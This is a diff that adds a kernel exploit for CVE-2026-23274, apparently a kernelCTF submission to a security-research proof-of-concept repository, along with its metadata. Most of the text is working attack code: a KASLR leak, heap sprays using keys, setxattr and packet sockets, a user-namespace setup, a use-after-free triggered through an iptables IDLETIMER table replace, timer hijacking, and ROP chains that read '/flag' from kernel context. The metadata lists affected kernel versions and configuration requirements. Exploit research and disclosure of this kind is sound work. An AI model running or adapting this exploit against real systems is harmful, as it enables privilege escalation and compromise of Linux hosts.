+ RopChain stage2_stack(*g_target, kaslr); + // Final process-context ROP stack: + // write "/flag" + // write printk fmt + // zero loff_t + // filp_open -> kernel_read -> _printk + append_qword_write(stage2_stack, path_ptr, flag_string); + append_qword_write(stage2_stack, fmt_ptr, fmt_lo); + append_qword_write(stage2_stack, fmt_ptr + 0x08, fmt_hi); + append_qword_write(stage2_stack, pos_ptr, 0x0); + add_target_rop_action(stage2_stack, "filp_open_path", + {path_ptr, file_open_flags, 0x0}); + add_target_rop_action(stage2_stack, "kernel_read_buf_from_rax", + {buf_ptr, read_count, pos_ptr}); + add_target_rop_action(stage2_stack, "printk_fmt_buf", + {buf_ptr, fmt_ptr}); + add_target_rop_action(stage2_stack, "park_loop"); + + std::vector pivot_metadata(0x70, 0); + memcpy(pivot_metadata.data() + 0x08, &add_rsp_0x88_ret, + sizeof(add_rsp_0x88_ret)); + memcpy(pivot_metadata.data() + 0x66, &pop_rsp_pop_r13_ret, + sizeof(pop_rsp_pop_r13_ret)); + + Payload pivot_payload(0x98 + stage2_stack.GetByteSize()); + pivot_payload.Set(0x00, pivot_metadata); + pivot_payload.Set(0x98, stage2_stack.GetData()); + + RopChain pivot_setup_rop(*g_target, kaslr); + append_payload_write(pivot_setup_rop, pivot_base, pivot_payload); + for (uint64_t word : pivot_setup_rop.GetDataWords()) + ctx[rop++] = word; + + // Softirq -> process-context bridge: + // queue fake work on CPU0 via execute_in_process_context+0x48 + // then stop CPU1 so CPU0 can run the queued kworker path + RopChain queue_bridge(*g_target, kaslr); + add_target_rop_action(queue_bridge, "queue_work_cpu0_then_stop", + {work_base, 0x0}); + for (uint64_t word : queue_bridge.GetDataWords()) + ctx[rop++] = word; + + // For 3.5 GB mem + pgvAdd(1,9,0x610); + size_t to_allocate = 0x7600; + for(int i = 0 ; i < to_allocate; i+=1){ + char* addr = (char*)mmap(0,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE,-1,0); + if( (long ) addr == -1 ) + break; + memcpy(addr,ctx,sizeof(ctx)); + } + pgvDel(1); +} + +#define N_THREADS 1 +void NPERM(){ 
+ int pid =fork(); + if(pid==0){ + nperm(); + exit(0); + } + waitpid(pid,0,0); +} +/* ============================= Nperm =============================*/ + +/* ========================= General Helper ======================== */ +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + perror("SYSCHK(" #x ")"); \ + __res; \ + }) + + +#include +void pin_to_cpu(int cpu) { + cpu_set_t set; + if (cpu < 0) + return; + CPU_ZERO(&set); + CPU_SET((unsigned)cpu, &set); + SYSCHK(sched_setaffinity(0, sizeof(set), &set)); +} +/* ========================= General Helper ======================== */ + +/* ======================= key_payload spray ======================= */ +#include +// #include +enum { + kWarmupKeyCount = 8, + kStageKeyCount = 40, +}; + +long long counter = 0; +int warmup_keys[kWarmupKeyCount]; +int stage_keys[kStageKeyCount]; +char description[0x20]; +unsigned char buf[0x1000]; +int key_alloc_fast() { + snprintf(description, sizeof(description), "key%lld", counter++); + // return keyAdd(description, buf, 220); + return syscall(__NR_add_key, "user", description, buf, 220, KEY_SPEC_PROCESS_KEYRING); +} + +int key_unlink_fast(int key) { + // return keyDel(key); // this uses KEYCTL_REVOKE, but we want KEYCTL_UNLINK. + return syscall(__NR_keyctl, KEYCTL_UNLINK, key, KEY_SPEC_PROCESS_KEYRING); +} +/* ======================= key_payload spray ======================= */ + +/* ========================= setxattr spray ======================== */ +#include +unsigned char buf_a[0x1000]; +void setxattr_spray() { // not exist in libxdk + setxattr("/tmp/frank", "spray", buf_a, 220, XATTR_CREATE); +} +/* ========================= setxattr spray ======================== */ + +/* =============================== User NS =============================== */ +#include +#include +#define W(path, fmt, ...) 
({ \ + char __b[128]; \ + int __n = snprintf(__b, sizeof(__b), fmt, ##__VA_ARGS__); \ + int __fd = SYSCHK(open(path, O_WRONLY)); \ + if (SYSCHK(write(__fd, __b, __n)) != __n) \ + perror("short write"); \ + close(__fd); \ +}) + +void unshare_setup() { + uid_t u = getuid(); + gid_t g = getgid(); + SYSCHK(unshare(CLONE_NEWUSER)); + W("/proc/self/setgroups", "deny\n"); + W("/proc/self/uid_map", "0 %d 1\n", u); + W("/proc/self/gid_map", "0 %d 1\n", g); + SYSCHK(setresgid(0,0,0)); + SYSCHK(setresuid(0,0,0)); + SYSCHK(unshare(CLONE_NEWNET | CLONE_NEWNS)); +} +/* =============================== User NS =============================== */ + +struct ipt_replace *repl; +size_t repl_len; +void vuln_setup(int fd); + +int trigger_vuln() { // This should crash the kernel directly + system("echo 233 > /tmp/frank"); // for setxattr spray + ((long long*)buf_a)[19] = 4000; // expires + ((long long*)buf_a)[20] = 0xdeadbeefcafebabe; // RIP + unshare_setup(); + while (1) { + int fd = SYSCHK(socket(AF_INET, SOCK_RAW, IPPROTO_RAW)); + vuln_setup(fd); + setxattr_spray(); + SYSCHK(setsockopt(fd, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, (socklen_t)repl_len)); + sleep(2); + close(fd); + } + sleep(999); + return 0; +} + +int main(int argc, char **argv) { + if (argc > 1 && strcmp(argv[1], "--vuln-trigger") == 0) { + return trigger_vuln(); + } + pin_to_cpu(1); + init_libxdk(); + uint64_t num_pages = g_target->GetNumPages(); + kaslr = leak_kaslr_base(num_pages, /* samples = */ 100, /* trials = */ 3); + // kaslr = bypass_kaslr(); + printf("[+] KASLR slide: 0x%lx\n", kaslr); + setup_kernel_address(); + size_t timer_entry_pprev_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.entry.pprev") / sizeof(uint64_t); + size_t timer_expires_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.expires") / sizeof(uint64_t); + size_t timer_function_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.function") / sizeof(uint64_t); + size_t timer_flags_idx = + g_target->GetFieldOffset("idletimer_tg", 
"timer.flags") / sizeof(uint64_t); + + system("echo 233 > /tmp/frank"); // for setxattr spray + NPERM(); + puts("NPERM done."); + + // for (int i = 0; i < 25; i++) { + // ((long long*)buf)[i] = 0x2809099f00000000 + (i << 16); + // } + // =============================== fengshui payload =============================== + ((long long*)buf)[6] = nperm_stage1_dispatch; // rax=pc + // nperm_stage1_dispatch: mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; + // rbx = legit rdi, Nprem addr + // rdx = [rdi+0xc0], Nprem[24] + // rax_old = Nprem[1] + // rax_new = *(Nprem[1] + 0xa8) = new PC + ((long long*)buf)[7] = nperm_addr; // rdi + + // =============================== first UBI payload =============================== + // ((long long*)buf)[0x11] = 1; // next + ((long long*)buf_a)[timer_entry_pprev_idx] = 0; // pprev, set to 0 to skip "if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {" + ((long long*)buf_a)[timer_expires_idx] = 4000; // expires + ((long long*)buf_a)[timer_function_idx] = timer_stage1_callback; // function, use 0xffffffffc0018004 to debug + // timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; + // mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? + ((long long*)buf_a)[timer_flags_idx] = 0; // flags, set TIMER_MIGRATING will dead-lock; + + + unshare_setup(); + int fd = SYSCHK(socket(AF_INET, SOCK_RAW, IPPROTO_RAW)); + + vuln_setup(fd); + puts("Sleep for stable reclaim."); + for (int i = 0; i < 3; i++) { + printf("."); + fflush(stdout); + sleep(1); + } + + puts("\nInstalling table replacement"); + // Keep the exploit non-interactive for repeated VM-side retries. 
+ for (int i = 0; i < kWarmupKeyCount; i++) { + warmup_keys[i] = SYSCHK(key_alloc_fast()); + } + for (int i = 0; i < kStageKeyCount; i++) { + stage_keys[i] = SYSCHK(key_alloc_fast()); + } + SYSCHK(key_unlink_fast(stage_keys[29])); + SYSCHK(key_unlink_fast(stage_keys[33])); + // SYSCHK(key_unlink_fast(stage_keys[36])); + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); // https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2024-53164_lts_cos_mitigation/exploit/lts-6.6.60/exploit.c#L205-L210 + setxattr_spray(); + // Trigger kmalloc then UBI + SYSCHK(setsockopt(fd, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, (socklen_t)repl_len)); + sleep(999); +} + +// --- Exploit ends --- + +// --- Below are bug triggering functions --- + +#include +#include + +#ifdef __cplusplus +typedef struct ipt_entry_marshaled { + struct ipt_ip ip; + unsigned int nfcache; + __u16 target_offset; + __u16 next_offset; + unsigned int comefrom; + struct xt_counters counters; + __extension__ unsigned char elems[0]; +} ipt_entry_marshaled; + +static_assert(sizeof(ipt_entry_marshaled) == sizeof(struct ipt_entry), + "ipt_entry size drift"); +static_assert(alignof(ipt_entry_marshaled) == alignof(struct ipt_entry), + "ipt_entry align drift"); +static_assert(offsetof(ipt_entry_marshaled, elems) == + offsetof(struct ipt_entry, elems), + "ipt_entry elems offset drift"); +#else +typedef struct ipt_entry ipt_entry_marshaled; +#endif + +struct ipt_standard { + ipt_entry_marshaled entry; + struct xt_standard_target target; +}; + +struct ipt_error { + ipt_entry_marshaled entry; + struct xt_error_target target; +}; + +#ifdef __cplusplus +static_assert(offsetof(ipt_standard, target) == sizeof(struct ipt_entry), + "ipt_standard target offset drift"); +static_assert(sizeof(ipt_standard) == + sizeof(struct ipt_entry) + sizeof(struct xt_standard_target), + "ipt_standard size drift"); + +static_assert(offsetof(ipt_error, target) == sizeof(struct ipt_entry), + "ipt_error target offset 
drift"); +static_assert(sizeof(ipt_error) == + sizeof(struct ipt_entry) + sizeof(struct xt_error_target), + "ipt_error size drift"); +#endif + +void init_standard_accept(struct ipt_standard *s) { + memset(s, 0, sizeof(*s)); + s->entry.target_offset = sizeof(struct ipt_entry); + s->entry.next_offset = sizeof(*s); + s->target.target.u.user.target_size = XT_ALIGN(sizeof(struct xt_standard_target)); + s->target.verdict = -NF_ACCEPT - 1; +} + +void init_error(struct ipt_error *e) { + memset(e, 0, sizeof(*e)); + e->entry.target_offset = sizeof(struct ipt_entry); + e->entry.next_offset = sizeof(*e); + e->target.target.u.user.target_size = XT_ALIGN(sizeof(struct xt_error_target)); + memcpy(e->target.target.u.user.name, XT_ERROR_TARGET, sizeof(XT_ERROR_TARGET)); + memcpy(e->target.errorname, "ERROR", 5); +} + +void init_idletimer_rule_v1_alarm(unsigned char *buf, size_t rule_sz, const char *label, uint32_t timeout) { + struct ipt_entry *e = (struct ipt_entry *)buf; + struct xt_entry_target *t; + struct idletimer_tg_info_v1 *info; + const size_t target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info_v1)); + + memset(buf, 0, rule_sz); + e->target_offset = sizeof(struct ipt_entry); + e->next_offset = (uint16_t)rule_sz; + + t = (struct xt_entry_target *)(buf + e->target_offset); + memset(t, 0, target_sz); + t->u.user.target_size = (uint16_t)target_sz; + memcpy(t->u.user.name, "IDLETIMER", sizeof("IDLETIMER")); + t->u.user.revision = 1; + + info = (struct idletimer_tg_info_v1 *)t->data; + memset(info, 0, sizeof(*info)); + info->timeout = timeout; + strncpy(info->label, label, sizeof(info->label) - 1); + info->send_nl_msg = 0; + info->timer_type = XT_IDLETIMER_ALARM; +} + +void init_idletimer_rule_v0(unsigned char *buf, size_t rule_sz, const char *label, uint32_t timeout) { + struct ipt_entry *e = (struct ipt_entry *)buf; + struct xt_entry_target *t; + struct idletimer_tg_info *info; + const size_t target_sz = XT_ALIGN(sizeof(struct xt_entry_target) 
+ sizeof(struct idletimer_tg_info)); + + memset(buf, 0, rule_sz); + e->target_offset = sizeof(struct ipt_entry); + e->next_offset = (uint16_t)rule_sz; + + t = (struct xt_entry_target *)(buf + e->target_offset); + memset(t, 0, target_sz); + t->u.user.target_size = (uint16_t)target_sz; + memcpy(t->u.user.name, "IDLETIMER", sizeof("IDLETIMER")); + t->u.user.revision = 0; + + info = (struct idletimer_tg_info *)t->data; + memset(info, 0, sizeof(*info)); + info->timeout = timeout; + strncpy(info->label, label, sizeof(info->label) - 1); +} + +void vuln_setup(int fd) { + struct ipt_getinfo gi; + memset(&gi, 0, sizeof(gi)); + memcpy(gi.name, "filter", 7); + socklen_t gil = sizeof(gi); + SYSCHK(getsockopt(fd, IPPROTO_IP, IPT_SO_GET_INFO, &gi, &gil)); + + const unsigned int valid = (1u << NF_INET_LOCAL_IN) | (1u << NF_INET_FORWARD) | (1u << NF_INET_LOCAL_OUT); + const size_t std_sz = sizeof(struct ipt_standard); + const size_t err_sz = sizeof(struct ipt_error); + const size_t rule1_target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info_v1)); + const size_t rule1_sz = XT_ALIGN(sizeof(struct ipt_entry) + rule1_target_sz); + const size_t rule0_target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info)); + const size_t rule0_sz = XT_ALIGN(sizeof(struct ipt_entry) + rule0_target_sz); + const size_t total = std_sz + std_sz + rule1_sz + rule0_sz + std_sz + err_sz; + repl_len = sizeof(struct ipt_replace) + total; + repl = (struct ipt_replace *)calloc(1, repl_len); + memcpy(repl->name, "filter", 7); + repl->valid_hooks = valid; + repl->num_entries = 6; + repl->size = (unsigned int)total; + repl->num_counters = gi.num_entries; + repl->hook_entry[NF_INET_LOCAL_IN] = 0; + repl->underflow[NF_INET_LOCAL_IN] = 0; + repl->hook_entry[NF_INET_FORWARD] = (unsigned int)std_sz; + repl->underflow[NF_INET_FORWARD] = (unsigned int)std_sz; + repl->hook_entry[NF_INET_LOCAL_OUT] = (unsigned int)(std_sz + std_sz); + 
repl->underflow[NF_INET_LOCAL_OUT] = (unsigned int)(std_sz + std_sz + rule1_sz + rule0_sz); + unsigned char *p = (unsigned char *)repl->entries; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + + char str[0x20] = "love_frank"; + init_idletimer_rule_v1_alarm(p, rule1_sz, str, 3600); + p += rule1_sz; + init_idletimer_rule_v0(p, rule0_sz, str, 1); + p += rule0_sz; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + + init_error((struct ipt_error *)p); +} + +/* =================== Bug trigger ends ===================*/ + +/* =================== NPrem Helper ===================*/ +#define PAGE_SIZE 0x1000 +#include +typedef struct { + int fd; + char *mapped; + size_t size; +} pgv_frame_t; +pgv_frame_t pgv[2] = {}; +int pgv_create_socket(size_t block_size, size_t block_nr) { + int socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); + if (socketfd < 0) { + perror("socket"); + return -1; + } + + int version = TPACKET_V1; + if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { + perror("setsockopt PACKET_VERSION"); + close(socketfd); + return -1; + } + + struct tpacket_req req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_block_nr = block_nr; + req.tp_frame_size = PAGE_SIZE; + req.tp_frame_nr = (block_size * block_nr) / PAGE_SIZE; + + if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { + perror("setsockopt PACKET_TX_RING"); + close(socketfd); + return -1; + } + + return socketfd; +} + +void pgvAdd(int idx, int order, int nr) { + size_t block_size = PAGE_SIZE * (1 << order); + pgv[idx].fd = pgv_create_socket(block_size, nr); + pgv[idx].size = block_size * nr; +} + +void *pgvMap(int idx) { + pgv[idx].mapped = (char*)mmap(NULL, pgv[idx].size, PROT_READ | PROT_WRITE, MAP_SHARED, pgv[idx].fd, 0); + if (pgv[idx].mapped == MAP_FAILED) { + perror("mmap"); + return NULL; + } + return 
pgv[idx].mapped; +} + +void pgvDel(int idx) { + if (pgv[idx].mapped && pgv[idx].mapped != MAP_FAILED) { + munmap(pgv[idx].mapped, pgv[idx].size); + pgv[idx].mapped = NULL; + } + if (pgv[idx].fd > 0) { + close(pgv[idx].fd); + pgv[idx].fd = 0; + } + pgv[idx].size = 0; +} +/* =================== NPrem Helper ===================*/ diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json new file mode 100644 index 000000000..b92993ea9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json @@ -0,0 +1,27 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp457"], + "vulnerability": { + "cve": "CVE-2026-23274", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf", + "affected_versions": ["5.7-rc1 - 7.0-rc3"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NETFILTER_XTABLES", + "CONFIG_NETFILTER_XT_TARGET_IDLETIMER", + "CONFIG_IP_NF_IPTABLES" + ] + } + }, + "exploits":{ + "cos-113-18244.582.2": { + "environment": "cos-113-18244.582.2", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "2 ~ 3 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz new file mode 100644 index 000000000..ecf6f5d0a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz differ